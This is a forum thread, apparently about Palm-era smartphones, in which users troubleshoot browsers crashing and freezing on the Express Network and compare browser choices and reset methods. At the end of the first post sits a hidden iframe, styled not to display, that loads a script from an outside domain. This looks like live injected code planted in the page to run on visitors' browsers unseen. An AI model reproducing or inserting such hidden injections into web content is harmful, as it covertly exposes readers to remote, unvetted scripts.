+ Reply to Thread

Express Network Crashing?

Is anybody else having trouble with the browsers crashing while using Express Network? I can get on line but the screen will invert (black background, white letters) and the phone freezes. I have to reset it. It happens everytime when using Blazer, sometimes using ESI. What Browsers are you guys using?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator
    do you have any hacks installed? have you tried soft and warm resets?

No hacks installed... I've only done soft resets. Any Ideas?

:conf

Administrator
    may try a warm reset..

do you get an error message? if so,what does it say?

Re: Express Network Crashing?

Originally posted by kjoanos
    Is anybody else having trouble with the browsers crashing while using Express Network? I can get on line but the screen will invert (black background, white letters) and the phone freezes. I have to reset it. It happens everytime when using Blazer, sometimes using ESI. What Browsers are you guys using?
    kjoanos,

I have not had any problems but I do not have blazer. EIS seems to work, though it is very slow. Eudora Web isn't pretty, but it does seem to work quickly.

I have noticed one problem with Eudora -- when loading large pages (like 90K) it will often make it only through 30K or 40K and then it just displays the page incomplete. In fact, it happens while browsing long threads in this forum. A refresh won’t solve the problem.

I posted another thread about problems with Express Network and Dormant connections. There seem to be a bunch if problems (all avoidable). In using this I have had the phone side just down several times, and I have had to do a few soft resets.

You can avoid most of these problems by not switching in/out of the FaxModem app, and shutting down a connection when you are done with it from the pda side.

Glenn